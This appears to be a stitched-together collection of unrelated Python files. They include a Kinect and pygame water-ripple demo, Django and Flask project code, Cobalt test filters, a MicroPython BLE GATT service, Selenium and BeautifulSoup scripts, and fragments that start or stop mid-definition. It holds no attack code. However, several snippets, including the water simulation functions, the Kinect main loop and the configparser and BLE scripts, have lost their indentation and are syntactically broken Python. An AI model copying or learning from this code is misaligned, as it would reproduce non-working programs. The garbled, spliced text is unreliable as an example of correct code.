        Fix: reuses get_distance() instead of duplicating the norm
        computation inline.
        """
        self.distances.append(self.get_distance())

    def __repr__(self):
        return "{0}-{1}".format(self.name1, self.name2)

    def __hash__(self):
        # Order-independent sum, consistent with the symmetric __eq__.
        return hash(self.name1) + hash(self.name2)

    def __eq__(self, other):
        """Symmetric name-based equality.

        Fix: comparing against a non-AtomPair used to raise AttributeError;
        returning NotImplemented lets Python fall back to identity.
        """
        if not isinstance(other, AtomPair):
            return NotImplemented
        if self.name1 == other.name1 and self.name2 == other.name2:
            return True
        return self.name1 == other.name2 and self.name2 == other.name1
from django.contrib import admin
from .models import Place,Question,Choice
from import_export.admin import ExportActionModelAdmin, ImportExportMixin, ImportMixin
class PlaceAdmin(ImportExportMixin, admin.ModelAdmin):
    """Admin for Place with import/export support (django-import-export)."""
    pass


# Fix: PlaceAdmin was defined but never passed to register(), so Place was
# shown with the default ModelAdmin and no import/export actions.
admin.site.register(Place, PlaceAdmin)
admin.site.register(Question)
admin.site.register(Choice)
|
# ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# Available under the Microsoft PyKinect 1.0 Alpha license. See LICENSE.txt
# for more information.
#
# ###########################################################################/
import thread
import itertools
import ctypes
import pykinect
from pykinect import nui
from pykinect.nui import JointId
import pygame
from pygame.color import THECOLORS
from pygame.locals import *
import numpy
from scipy import ndimage
from operator import *
from random import *
from math import *
KINECTEVENT = pygame.USEREVENT
DEPTH_WINSIZE = 640,480
pygame.init()

# Screen resolution...
RES = numpy.array((DEPTH_WINSIZE))
# Working buffer size: half the depth-window resolution in each dimension.
CHUNKY = RES/2
PI = 3.14159
DEG2RAD = PI/180

# Shortcut to the skeleton -> depth-image coordinate mapping.
skeleton_to_depth_image = nui.SkeletonEngine.skeleton_to_depth_image

# recipe to get address of surface: http://archives.seul.org/pygame/users/Apr-2008/msg00218.html
# Py_ssize_t width depends on the CPython build (32- vs 64-bit C API).
if hasattr(ctypes.pythonapi, 'Py_InitModule4'):
    Py_ssize_t = ctypes.c_int
elif hasattr(ctypes.pythonapi, 'Py_InitModule4_64'):
    Py_ssize_t = ctypes.c_int64
else:
    raise TypeError("Cannot determine type of Py_ssize_t")

# Raw C-API buffer accessor used by surface_to_array() below.
_PyObject_AsWriteBuffer = ctypes.pythonapi.PyObject_AsWriteBuffer
_PyObject_AsWriteBuffer.restype = ctypes.c_int
_PyObject_AsWriteBuffer.argtypes = [ctypes.py_object,
                                    ctypes.POINTER(ctypes.c_void_p),
                                    ctypes.POINTER(Py_ssize_t)]
def surface_to_array(surface):
    """Return the raw pixel bytes of a pygame surface as a ctypes byte
    array, without copying (uses the CPython write-buffer API)."""
    buffer_interface = surface.get_buffer()
    address = ctypes.c_void_p()
    size = Py_ssize_t()
    _PyObject_AsWriteBuffer(buffer_interface,
                            ctypes.byref(address), ctypes.byref(size))
    bytes = (ctypes.c_byte * size.value).from_address(address.value)
    # Keep the buffer object alive for as long as the byte array exists.
    bytes.object = buffer_interface
    return bytes
def skeleton_frame_ready(frame):
    """Kinect callback: draw crosses at each tracked skeleton's hand
    positions, mapped into the CHUNKY-sized view.

    NOTE(review): draw_cross is defined elsewhere in this file (not
    visible in this chunk).
    """
    skeletons = frame.SkeletonData
    if skeletons is not None:
        for index, data in enumerate(skeletons):
            if (data.eTrackingState == nui.SkeletonTrackingState.TRACKED):
                left_hand_pos = skeleton_to_depth_image(data.SkeletonPositions[JointId.HandLeft], CHUNKY[0], CHUNKY[1])
                right_hand_pos = skeleton_to_depth_image(data.SkeletonPositions[JointId.HandRight], CHUNKY[0], CHUNKY[1])
                #left_hand = data.SkeletonPositions[JointId.HandLeft]
                #print left_hand_pos[0]
                #print left_hand_pos[1]
                # x is mirrored across the 320-pixel-wide view.
                draw_cross(320-int(left_hand_pos[0]), int(left_hand_pos[1]))
                draw_cross(320-int(right_hand_pos[0]), int(right_hand_pos[1]))
def depth_frame_ready(frame):
    """Kinect callback: stash the latest depth bitmap for the render loop.

    NOTE(review): `video_display` is defined elsewhere in this file; when
    it is truthy the depth frame is skipped entirely.
    """
    global depth_frame_bits
    if video_display:
        return

    #depth_frame_array = numpy.ctypeslib.as_array(frame.image.bits)
    depth_frame_bits = frame.image.bits
    #address = surface_to_array(dept_frame_surface)
    #ctypes.memmove(address, frame.image.bits, len(address))
    #del address
    #pygame.display.update()
# ------------------------------------------------------------------------------------
def make_indices_array(shape):
    """Build a 3-d grid where element [0][i][j] == i and [1][i][j] == j.

    For 2-d shapes this is exactly numpy.indices(shape); the original
    indices/transpose/reverse sequence computed the same array.
    """
    return numpy.indices(shape)
# ------------------------------------------------------------------------------------
def texturemap(flattened_texture, heightmap, indices_array):
    """Displace each pixel's source coordinate by the local height and sample.

    All three arguments share the same 2-d grid dimensions; the texture is
    supplied pre-flattened. Returns the warped texture as a 2-d array.
    """
    rows, cols = heightmap.shape
    # Offset both coordinate planes by the height field, wrapping at edges.
    src_r = (indices_array[0] + heightmap) % rows
    src_c = (indices_array[1] + heightmap) % cols
    flat_lookup = src_r * cols + src_c
    sampled = numpy.take(flattened_texture, flat_lookup.flat)
    return numpy.reshape(sampled, (rows, cols))
# ------------------------------------------------------------------------------------
def Draw_water(dest, map, texture, LightModifier, indicies):
"Calcs the heights slopes, applies texturing, returns for screen draw"
# For each pixel in the buffer, the delta = this_pixel - next_pixel. We don't calculate the edges...
h_map = numpy.zeros(CHUNKY, dtype=int)
thispix = map[1:-1,1:-1]
nextpix = map[:-2,1:-1]
h_map[1:-1,1:-1] = thispix - nextpix
# The array of deltas is then used in the texture mapping to grab source pixels
# Note: the "python" version of the texture mapping routine is in comments below.
h_map += texturemap(texture,h_map, indicies)
# Quick diversion:
# for no texturing, comment out the line above, to remove lighting, change the '+=' to '='
# Ramp down by our lighting modifier...
h_map /= int(pow(2, LightModifier))
# Make sure all values are between 0 and 255 (maps to the palette)
dest = numpy.clip(h_map,0,255)
# Return the buffer for screen draw...
return dest
# ------------------------------------------------------------------------------------
def Calc_water(opage, mymap, density):
"Performs the smothing of the height map..."
# Setup the height maps for reference.
new_page = mymap[opage]
old_page = mymap[opage^1]
center = new_page[1:-1,1:-1]
origcenter = numpy.array(center)
center[:] = old_page[2:,2:]
center += old_page[1:-1,2:]
center += old_page[:-2,2:]
center += old_page[2:,1:-1]
center += old_page[:-2,1:-1]
center += old_page[2:,:-2]
center += old_page[1:-1,:-2]
center += old_page[:-2,:-2]
center /= 4
center -= origcenter
center -= (center / int(pow(2, density)))
def heightBlob(x, y, height, radius, h_map):
    """Stamp a filled circle of the given height into the height map.

    Unlike the original "sineblob" the disc is flat; its bounding box is
    clipped against the CHUNKY grid before drawing.
    """
    radius_sq = radius * radius
    # Start with the full bounding box of the disc...
    left, right = -radius, radius
    top, bottom = -radius, radius
    # ...then pull in any side that would land outside the grid.
    if x - radius < 1:
        left -= (x - radius) - 1
    if y - radius < 1:
        top -= (y - radius) - 1
    if x + radius > CHUNKY[0] - 1:
        right -= x + radius - CHUNKY[0] + 1
    if y + radius > CHUNKY[1] - 1:
        bottom -= y + radius - CHUNKY[1] + 1
    # Raise every cell inside the (clipped) circle by `height`.
    for dy in range(top, bottom):
        dy_sq = dy * dy
        for dx in range(left, right):
            if dx * dx + dy_sq < radius_sq:
                h_map[dx + x][dy + y] += height
def gauss_kern(size, sizey=None):
    """Return a normalized 2D Gaussian kernel array for convolutions."""
    half_x = int(size)
    # A falsy sizey (None or 0) means "square kernel".
    half_y = half_x if not sizey else int(sizey)
    xs, ys = numpy.mgrid[-half_x:half_x + 1, -half_y:half_y + 1]
    kernel = numpy.exp(-(xs ** 2 / float(half_x) + ys ** 2 / float(half_y)))
    return kernel / kernel.sum()
def draw_cross(x, y):
global height_buffer, hpage, pheight
if x < CHUNKY[0] - 1 and y < CHUNKY[1] - 1 and x > 0 and y > 0:
# Draw a cross in the height map...
height_buffer[hpage][x][y] = pheight
height_buffer[hpage][x+1][y] = pheight >> 1
height_buffer[hpage][x-1][y] = pheight >> 1
height_buffer[hpage][x][y+1] = pheight >> 1
height_buffer[hpage][x][y-1] = pheight >> 1
def blur_image(im, n, ny=None):
    """ blurs the image by convolving with a gaussian kernel of typical
        size n. The optional keyword argument ny allows for a different
        size in the y direction.
    """
    # FIX: `signal` was never imported at module level (only scipy.ndimage
    # is), so calling this function raised NameError. Import it locally.
    from scipy import signal
    g = gauss_kern(n, sizey=ny)
    # 'valid' mode shrinks the output by the kernel radius on each edge.
    improc = signal.convolve(im, g, mode='valid')
    return improc
if __name__ == '__main__':
full_screen = False
draw_skeleton = False
video_display = False
depth_frame_bits = None
display_flags = 0
if full_screen:
display_flags = pygame.FULLSCREEN
screen_lock = thread.allocate()
screen = pygame.display.set_mode(DEPTH_WINSIZE, display_flags, 16)
pygame.display.set_caption('Python Kinect Demo')
skeletons = None
screen.fill(THECOLORS["black"])
kinect = nui.Runtime()
kinect.skeleton_engine.enabled = True
kinect.skeleton_frame_ready += skeleton_frame_ready
kinect.depth_frame_ready += depth_frame_ready
kinect.depth_stream.open(nui.ImageStreamType.Depth, 2, nui.ImageResolution.Resolution640x480, nui.ImageType.Depth)
print('Controls: ')
print(' d - Switch to depth view')
print(' v - Switch to video view')
print(' s - Toggle displaing of the skeleton')
print(' u - Increase elevation angle')
print(' j - Decrease elevation angle')
# main game loop
done = False
texture = pygame.image.load("water.gif")
# Good idea! Fit the texture to the chunky size...
texture = pygame.transform.scale(texture, CHUNKY)
texture_buff = pygame.surfarray.array2d(texture)
texture_buff = texture_buff.flat
# Two blank height maps
height_buffer = [numpy.zeros(CHUNKY, dtype=int), numpy.zeros(CHUNKY, dtype=int)]
# Buffer to draw on...
water_buffer = numpy.zeros(CHUNKY, dtype=int)
# Texture Lookup Table
texture_lut = make_indices_array(CHUNKY)
# Pygame Surface object which will take the surfarray data and be translated into a screen blit...
water_surface = pygame.Surface((CHUNKY[0], CHUNKY[1]), 0, 8)
depth_surface = pygame.Surface(RES, 0, 8)
#screen_surface = pygame.Surface(RES, 0, 16)
# apply the same palette to surface
water_surface.set_palette(texture.get_palette())
grayscale = tuple([(i, i, i) for i in range(255, -1, -1)])
depth_surface.set_palette(grayscale)
#screen_surface.set_palette(texture.get_palette())
# Pointer to the height_buffer we're using...
hpage = 0
# Rain drop locators
x = 80
y = 80
# initial surfer angles and placement...
xang = 0
yang = 0
offset = 0
ox =CHUNKY[0]/2
oy =CHUNKY[1]/2
# Water density - change this for jelly or mud effects
density = 4
# bobble height
pheight = 800
# Strength of the light - increase this for different lighting...
light = 1
# Size of blobs
radius = 15
# Mode 1 = rain (random)
# Mode 2 = Surfer
# Mode 3 = Blob
mode = 0
kernel = gauss_kern(3)
while not done:
# e = pygame.event.wait()
# dispInfo = pygame.display.Info()
pygame.event.pump()
# Check for keyboard input...
keyinput = pygame.key.get_pressed()
# If ESC or "QUIT" events occurred, exit...
if keyinput[K_ESCAPE] or pygame.event.peek(QUIT):
done = True
break
elif keyinput[K_u]:
kinect.camera.elevation_angle = kinect.camera.elevation_angle + 2
elif keyinput[K_j]:
kinect.camera.elevation_angle = kinect.camera.elevation_angle - 2
elif keyinput[K_x]:
kinect.camera.elevation_angle = 2
elif keyinput[K_w]:
mode = 1
elif keyinput[K_s]:
mode = 2
elif keyinput[K_b]:
mode = 3
if mode == 1:
# Make some noise!
# pick a random position for our 'drop'
x = randrange(2,(CHUNKY[0])-2)
y = randrange(2,(CHUNKY[1])-2)
# Add it to the height map we're currently working on...
height_buffer[hpage][x][y] = randrange(1,pheight<<2)
elif mode == 2:
# Surfer mode...
# Calc the new position (could slap this in a table)...
x = ((CHUNKY[0]/2)-10)*sin((xang*DEG2RAD) * 2)
y = ((CHUNKY[1]/2)-10)*cos((yang*DEG2RAD) * 3)
xang += 2
yang += 1
# Draw a cross in the height map...
height_buffer[hpage][int((ox+x))][int((oy+y))] = pheight
height_buffer[hpage][int((ox+x)+1)][int((oy+y))] = pheight >> 1
height_buffer[hpage][int((ox+x)-1)][int((oy+y))] = pheight >> 1
height_buffer[hpage][int((ox+x))][int((oy+y)+1)] = pheight >> 1
height_buffer[hpage][int((ox+x))][int((oy+y)-1)] = pheight >> 1
elif mode == 3:
# Blob mode...
x = randrange(2,(CHUNKY[0])-2)
y = randrange(2,(CHUNKY[1])-2)
# Draw a big blob in the height map
heightBlob(x,y, pheight, radius, height_buffer[hpage])
# Reset the mode. Don't dive into the shallow end.
mode = 0
# Draw the water and smooth the map...
water_buffer = Draw_water(water_buffer, height_buffer[hpage], texture_buff, light-1, texture_lut)
Calc_water(hpage^1, height_buffer, density)
# flip to the 'old' height map...
hpage ^= 1
pygame.surfarray.blit_array(water_surface, water_buffer)
temp = pygame.transform.scale(water_surface, screen.get_size())
temp = temp.convert(16)
if depth_frame_bits:
data = numpy.fromstring(depth_frame_bits, dtype=numpy.uint16)
data &= 8191
data.resize((480, 640))
data -= numpy.min(data.ravel())
data *= float(256) / float(numpy.max(data.ravel()))
data = ndimage.convolve(data, kernel, mode='constant', cval=0.0)
pygame.surfarray.blit_array(depth_surface, data.view(numpy.uint16).transpose())
screen.blit(temp, (0,0))
#screen.blit(depth_surface, (0,0))
screen.blit(depth_surface, (0,0), None, pygame.BLEND_SUB)
pygame.display.update()
|
import configparser
from common.constant import CONF_DIR
import os
#拼接配置文件路径
# conf_file_path = os.path.join(CONF_DIR,'conf.ini')
os.chdir('/Users/tianjianfeng/PycharmProjects/api-test-tian/conf')
cf = configparser.ConfigParser()
# filename = cf.read('conf.ini')
# print(filename)
#写入
# add section 添加section项
# set(section,option,value) 给section项中写入键值对
cf.add_section("mq")
cf.set("mq", "user", "laozhang")
cf.add_section("kafka")
cf.set("kafka", "user", "xiaozhang")
# write to file
with open("test1.ini","w+") as f:
cf.write(f)
|
# Copyright 2022 The Cobalt Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starboard win-win32 Platform Test Filters."""
import logging
import os
from starboard.shared.win32 import test_filters as shared_test_filters
from starboard.tools.testing import test_filter
# pylint: disable=line-too-long
_FILTERED_TESTS = {
'nplb': [
# This single test takes >15 minutes.
'SbPlayerTest.MultiPlayer',
# This test fails on win-win32 devel builds, because the compiler
# performs an optimization that defeats the SB_C_NOINLINE 'noinline'
# attribute.
'SbSystemGetStackTest.SunnyDayStackDirection',
# These tests are failing. Enable them once they're supported.
'MultiplePlayerTests/*beneath_the_canopy_137_avc_dmp*',
'SbMediaSetAudioWriteDurationTests/SbMediaSetAudioWriteDurationTest.WriteContinuedLimitedInput*',
'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.SecondaryPlayerTest/*',
# Failures tracked by b/256160416.
'SbSystemGetPathTest.ReturnsRequiredPaths',
'SbPlayerGetAudioConfigurationTests/*_video_beneath_the_canopy_137_avc_dmp_output_decode_to_texture_*',
'SbPlayerWriteSampleTests/*_video_beneath_the_canopy_137_avc_dmp_output_decode_to_texture_*',
'SbSocketAddressTypes/SbSocketBindTest.RainyDayBadInterface/type_ipv6_filter_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDayDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceForDestination/type_ipv6',
'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceNotLoopback/type_ipv6',
'SbSocketAddressTypes/SbSocketResolveTest.SunnyDayFiltered/filter_ipv6_type_ipv6',
'SbSocketAddressTypes/SbSocketSetOptionsTest.RainyDayInvalidSocket/type_ipv4',
'SbSocketAddressTypes/SbSocketSetOptionsTest.RainyDayInvalidSocket/type_ipv6',
# Flakiness is tracked in b/278276779.
'Semaphore.ThreadTakesWait_TimeExpires',
# Failure tracked by b/287666606.
'VerticalVideoTests/VerticalVideoTest.WriteSamples*',
# Enable once verified on the platform.
'SbMediaCanPlayMimeAndKeySystem.MinimumSupport',
],
'player_filter_tests': [
# These tests fail on our VMs for win-win32 builds due to missing
# or non functioning system video decoders.
'VideoDecoderTests/VideoDecoderTest.*/beneath_the_canopy_137_avc_dmp_DecodeToTexture*',
'VideoDecoderTests/VideoDecoderTest.*/black_test_avc_1080p_30to60_fps_dmp_DecodeToTexture*',
# PlayerComponentsTests fail on our VMs. Preroll callback is always not called in
# 5 seconds, which causes timeout error.
'PlayerComponentsTests/*',
],
}
# pylint: enable=line-too-long
def CreateTestFilters():
  """Factory hook: build the win-win32 filter set for the test runner."""
  platform_filters = WinWin32TestFilters()
  return platform_filters
class WinWin32TestFilters(shared_test_filters.TestFilters):
  """Starboard win-win32 Platform Test Filters."""

  def GetTestFilters(self):
    """Gets all tests to be excluded from a unit test run.

    Returns:
      A list of initialized TestFilter objects.
    """
    # Escape hatch: the buildbot can disable the whole suite via env var.
    if os.environ.get('COBALT_WIN_BUILDBOT_DISABLE_TESTS', '0') == '1':
      logging.error('COBALT_WIN_BUILDBOT_DISABLE_TESTS=1, Tests are disabled.')
      return [test_filter.DISABLE_TESTING]
    # Guard clause above replaces the original else-after-return nesting.
    filters = super().GetTestFilters()
    for target, tests in _FILTERED_TESTS.items():
      filters.extend(test_filter.TestFilter(target, test) for test in tests)
    if os.environ.get('EXPERIMENTAL_CI', '0') == '1':
      # Disable these tests in the experimental CI due to pending failures.
      experimental_filtered_tests = {
          'drain_file_test': [
              'DrainFileTest.SunnyDay',
              'DrainFileTest.SunnyDayPrepareDirectory',
              'DrainFileTest.RainyDayDrainFileAlreadyExists'
          ]
      }
      for target, tests in experimental_filtered_tests.items():
        filters.extend(test_filter.TestFilter(target, test) for test in tests)
    return filters
|
import sys

# Read a target n and print the largest k such that k*(k+1)/2 <= n.
# For negative n no k >= 0 qualifies and -1 is printed, exactly as the
# original loop did.
limit = int(sys.stdin.readline())
answer = -1
triangular = 0
while triangular <= limit:
    answer += 1
    triangular += answer + 1
print(answer)
import pymongo
import numpy as np
import matplotlib as plt
client = pymongo.MongoClient('localhost', 27017)
douban = client['douban']
movie_info = douban['movie_info']
for i in movie_info.find({}, {'movie_classify': 1, '_id': 0, 'movie_id': 1}).limit(10):
print(i)
# visiable
def plot_show():
data = movie_info.find({}, {'movie_classify': 1, '_id': 0, 'movie_id': 1})
|
## character_set.py Dana Hughes 28-Aug-2017
##
## Functions for loading in a character set
import pygame
from pygame.locals import *
import os
def load_bitmap(filename, dimensions=(8,16)):
"""
Load in the characters from a bitmap.
NOTE: Currently assumes a 2-bit (BW) bitmap.
filename - path to the bitmap file
dimensions - width x height of individual character in bitmap
"""
# Does the file exist?
if not os.path.exists(filename):
print "File %s does not exist!" % filename
return None
with open(filename) as bitmap_file:
bitmap = pygame.image.load(bitmap_file)
# Extract the characters
characters = []
# How many characters across and down in the image?
char_width, char_height = dimensions
num_x = bitmap.get_width()/ char_width
num_y = bitmap.get_height() / char_height
# Convert the surface to a bit array for easy extraction. Any non-zero bit
# should be set to 1.
bit_array = pygame.surfarray.array2d(bitmap)
bit_array[bit_array > 0] = 1
# Extract the characters - These need to load from left to right, top to bottom,
# hence the hight index first
for j in range(num_y):
y = j*char_height
for i in range(num_x):
x = i*char_width
char = pygame.surfarray.make_surface(bit_array[x:x+char_width,y:y+char_height])
characters.append(char)
return characters
|
from selenium import webdriver
driver = webdriver.Chrome(executable_path=r'C:\Users\Akumar4\Downloads\chromedriver_win32\chromedriver.exe')
driver.get('http://demo.automationtesting.in/FileDownload.html')
driver.maximize_window()
"""
Inorder to download a file in the above website need to enter details in the provided text box then Generate button will be Enabled.
Click on Generate, Download link will be avail for downloading data in a Text file. Similarly for PDF.
"""
driver.find_element_by_id('textbox').send_keys('Download the Text file')
driver.find_element_by_id('createTxt').click()
driver.find_element_by_xpath('//*[@id="link-to-download"]').click()
|
import json
from dataclasses import dataclass
from json import JSONDecodeError
from typing import List
from bs4 import BeautifulSoup
@dataclass
class Schematic:
name: str
rarity: str
stars: str
perks: List[str]
schematic_type: str
material: str
def load_schematics(file) -> List[Schematic]:
    """Parse every .item-wrapper element of `file` into a Schematic."""
    soup = parse_schematics(file)
    parsed = []
    for element in soup.findAll("div", {"class": "item-wrapper"}):
        item_name = element.get('data-name')
        try:
            perk_list = deserialize_perks(element.get('data-perks'))
        except JSONDecodeError as err:
            # Surface which item carried the malformed perk JSON, then fail.
            print(item_name)
            raise err
        parsed.append(Schematic(name=item_name.strip(),
                                rarity=element.get('data-rarity'),
                                stars=element.get('data-stars'),
                                perks=perk_list,
                                schematic_type=element.get('data-type'),
                                material=element.get('data-material')))
    return parsed
def parse_schematics(file):
    """Read the schematics HTML, repair mangled quote entities, and parse."""
    markup = read_schematics(file)
    # The export mangles &quot; into these two broken forms; restore them.
    for mangled in ("&quoquot;", "&qquot;"):
        markup = markup.replace(mangled, "&quot;")
    return BeautifulSoup(markup, 'html.parser')
def read_schematics(file: str):
    """Return the full contents of the schematics HTML file (UTF-8).

    Uses a context manager so the handle is closed even if read() raises,
    fixing the original open/read/close sequence's potential leak.
    """
    with open(file, mode='r', encoding="utf-8") as handle:
        return handle.read()
def deserialize_perks(perks) -> List[str]:
    """Decode the data-perks JSON blob into a list of perk descriptions."""
    try:
        return [entry['d'] for entry in json.loads(perks)]
    except JSONDecodeError as e:
        # Dump the offending payload before propagating the parse error.
        print(perks)
        raise e
def print_schematics(schematics: List[Schematic]):
    """Print one pipe-separated line per schematic: name|type|rarity|perks."""
    for item in schematics:
        joined_perks = "|".join(item.perks)
        line = "|".join([item.name, item.schematic_type, item.rarity, joined_perks])
        print(line)
def main():
    """Load the schematics file and dump one line per item to stdout."""
    all_schematics = load_schematics('schematics.html')
    print_schematics(all_schematics)


if __name__ == '__main__':
    main()
|
import gc
import machine
import utime
import ubinascii
import uos
from machine import Timer
from L99_BLEGATTS import BLEGATTS
hardware_serial = ubinascii.hexlify(machine.unique_id()).decode()
l99_serial = 'L99-%s' % hardware_serial
def ble_connection_callback(is_connected):
    """Log BLE central connect/disconnect events to the console."""
    if not is_connected:
        print("BLE disconnected")
    else:
        print("BLE connected")
ble = BLEGATTS()
ble.init(advert_name=l99_serial, connect_callback=ble_connection_callback)
ble.addService(service_name='device_info',uuid=6154) \
.addReadChar (name='l99_serial', uuid=0, static_read=l99_serial) \
.addReadChar (name='hardware_serial', uuid=1, static_read=hardware_serial) \
.addReadChar (name='sysname', uuid=2, dynamic_read=lambda cn,id: uos.uname()[0]) \
.addReadChar (name='nodename', uuid=3, dynamic_read=lambda cn,id: uos.uname()[1]) \
.addReadChar (name='release', uuid=4, dynamic_read=lambda cn,id: uos.uname()[2]) \
.addReadChar (name='version_number', uuid=5, dynamic_read=lambda cn,id: uos.uname()[3].split(' on ')[0]) \
.addReadChar (name='version_date', uuid=6, dynamic_read=lambda cn,id: uos.uname()[3].split(' on ')[1]) \
.addReadChar (name='machine', uuid=7, dynamic_read=lambda cn,id: uos.uname()[4]) \
.addReadChar (name='lora_version', uuid=8, dynamic_read=lambda cn,id: uos.uname()[5]) \
.start()
ble.addService(service_name='char_tests',uuid=0) \
.addNotifyChar (name='note1', uuid=0, static_read=0) \
.addReadNotifyChar (name='note2', uuid=1, static_read=0) \
.addReadChar (name='self', uuid=2, dynamic_read=lambda cn,id: cn+str(id)) \
.addReadWriteChar (name='r+w', uuid=3,
dynamic_read=lambda cn,id: char_rw_test_read(cn,id),
dynamic_write=lambda cn,id,val: char_rw_test_write(cn,id,val)) \
.addReadWriteNotifyChar (name='r+w+n', uuid=4,
dynamic_read=lambda cn,id: char_rwn_test_read(cn,id),
dynamic_write=lambda cn,id,val: char_rwn_test_write(cn,id,val)) \
.start()
ble.advertise()
# Backing store shared by the read/write test characteristics.
rw_var = 1337


def char_rw_test_read(char_name, char_uuid):
    """Dynamic read hook for the plain read/write characteristic."""
    return rw_var


def char_rw_test_write(char_name, char_uuid, char_value):
    """Dynamic write hook: remember the last written value."""
    global rw_var
    rw_var = char_value


def char_rwn_test_read(char_name, char_uuid):
    """Dynamic read hook for the read/write/notify characteristic."""
    return rw_var


def char_rwn_test_write(char_name, char_uuid, char_value):
    """Dynamic write hook: store the value, then push a notification."""
    global rw_var
    rw_var = char_value
    ble.setCharValue('char_tests', 'r+w+n', rw_var)  # ain't gonna notify itself
def char_timer(t):
global counter
counter = counter + 1
ble.setCharValue('char_tests','note1',counter)
ble.setCharValue('char_tests','note2',counter) # i can only get one or the other to notify, but not both
counter = 1
timer = Timer.Alarm(handler=char_timer, ms=2000, periodic=True)
'''
try:
while True:
machine.idle()
except:
pass
''' |
from flask import request, redirect, render_template, Blueprint, json, url_for, session, flash
from flask_login import login_required
from project.project_module.forms import AddProject, ShareProjectForm
from project.project_module.models import project_wapper
from project.utils.statics_data import date_in_result, not_in_result
from project.utils.conversions import to_date_time, to_date, with_utf
from project.request_module.apicalls import project_api
project_print = Blueprint('project', __name__, template_folder='templates/project_module')
api = project_api()
@project_print.route('/')
@login_required
def index():
    """Render the project list for the logged-in user."""
    uid_send = dict()
    uid_send["uid"] = session['uid']
    print(json.dumps(uid_send))
    data = api.get_all(session['uid'])
    var = list()
    try:
        var = data['all_projects']
        print(var)
    except (KeyError, TypeError):
        # FIX: was a blanket `except Exception: pass`. Only a missing
        # 'all_projects' payload (or a non-dict response) should fall back
        # to an empty list; anything else should surface.
        pass
    return render_template('project_module.html', var=var)
@project_print.route('/new', methods=['GET', 'POST'])
@login_required
def new_project():
    """Show the project creation form; on POST, create it via the API."""
    form = AddProject()
    if request.method == 'POST':
        # Collect the form fields into the API payload in one pass.
        field_names = ('project_name', 'project_description',
                       'project_starting_date', 'project_releasing',
                       'customer_name', 'customer_contact', 'customer_mail',
                       'customer_company_name', 'customer_site')
        project_ = {name: form[name].data for name in field_names}
        project_['uid'] = session['uid']
        project_obj = project_wapper(project_)
        print('==>>REQUEST : {}'.format(str(project_obj.__dict__)))
        data = api.create(json.dumps(project_obj.__dict__))
        print('{} response '.format(data))
        if data['status']:
            return redirect(url_for('project.index'))
    return render_template('new_project.html', form=form)
@project_print.route('/edit/<int:pid>', methods=['GET', 'POST'])
@login_required
def edit(pid):
    """Edit project `pid`: prefill the form on GET, save via the API on POST."""
    form = AddProject()
    req = {'pid': pid, 'uid': session['uid']}
    res = api.view(req)
    print('RESPONSE : {}'.format(str(res)))
    # BUG FIX: test for an empty result BEFORE indexing. The original read
    # res['all_projects'][0] first, raising IndexError whenever the API
    # returned an empty project list.
    if len(res['all_projects']) == 0:
        return render_template('project_view.html', data='NO')
    data = res['all_projects'][0]
    if len(data) == 0:
        return redirect(url_for('project.index'))
    else:
        print(type(data))
    if request.method == 'GET':
        # Prefill the form; date fields need conversion to display format.
        for key, val in data.items():
            if key in ['project_name', 'project_description', 'customer_contact', 'customer_company_name',
                       'customer_site', 'customer_mail', 'customer_name']:
                form[key].data = val
            if key in ['project_starting_date', 'project_releasing']:
                form[key].value = with_utf(to_date(val))
                print('KEY >{} {}'.format(type(to_date_time(val)), val))
    if request.method == 'POST':
        # Build the update payload from the editable fields only.
        project_ = dict()
        for key, val in data.items():
            if not key in not_in_result:
                project_[key] = form[key].data
        project_['uid'] = session['uid']
        project_obj = project_wapper(project_)
        print('==>>REQUEST : {}'.format(str(project_obj.__dict__)))
        up_req = {
            'user': req,
            'project': project_obj.__dict__
        }
        print('\n\n------<>{}'.format(up_req))
        data = api.save_edited(json.dumps(up_req))
        print('{} response '.format(data))
        if data['status']:
            return redirect(url_for('project.index'))
    return render_template('edit_project.html', form=form)
@project_print.route('/view')
@login_required
def project_view():
    """Display one project plus the users it is shared with."""
    req = {'pid': request.args.get('pid'), 'uid': session['uid']}
    res = api.view(req)
    users = api.get_project_users(req)
    print('RESPONSE : {}'.format(str(res)))
    projects = res['all_projects']
    if len(projects) == 0:
        return render_template('project_view.html', data='NO')
    record = projects[0]
    # Convert the raw date fields into display-ready datetimes.
    for field in date_in_result:
        record[field] = to_date_time(record[field])
    return render_template('project_view.html', data=record, users=users['users'])
@project_print.route('/delete')
@login_required
def delete():
    """Delete a project; back to the listing on success, the view otherwise."""
    req = {'pid': request.args.get('pid'), 'uid': session['uid']}
    res = api.delete(req)
    print('RESPONSE : {}'.format(str(res)))
    target = 'project.index' if res['status'] else 'project.project_view'
    return redirect(url_for(target))
@project_print.route('/share/<int:project_id>', methods=['GET', 'POST'])
@login_required
def share(project_id):
    """Share a project with another user identified by mail address."""
    form = ShareProjectForm()
    if request.method == 'POST':
        req = {'pid': project_id, 'uid': session['uid'],
               'mail_id': str(form.mail_id.data)}
        res = api.share(req)
        print(str(res))
        message = 'Project Shared Successfully!' if res['status'] else 'Project Not Shared!'
        flash(message)
    return render_template('share_project.html', form=form)
|
from dihedral_transformations import get_dihedrical_transf
from TransformationCodes import rgb2hex
from heapq import heappush, heappop, nlargest
from heapq import merge as merge_heaps
import scipy.ndimage as get_scaled
from PIL import Image, ImageDraw
from multiprocessing import Array
from multiprocessing import Queue
from utils import *
import ctypes, numpy
from numpy import random
# Exception Classes
class MatingError(Exception):
    """Raised when offspring generation fails; details live in `reason`."""
    def __init__(self):
        # FIX: initialise the Exception base class as well.
        Exception.__init__(self)
        self.reason = ""
    def set_reason(self, reason):
        """Attach a diagnostic payload describing the failure."""
        self.reason = reason
class MSEError(Exception):
    """Signals a failure while computing the MSE fitness term."""

    def __init__(self):
        self.reason = ""

    def set_reason(self, reason):
        """Record why the MSE computation failed."""
        self.reason = reason
class Generator(multiprocessing.Process):
def __init__(self, work_queue, result_queue, event_start, props):
# Metaproccessed
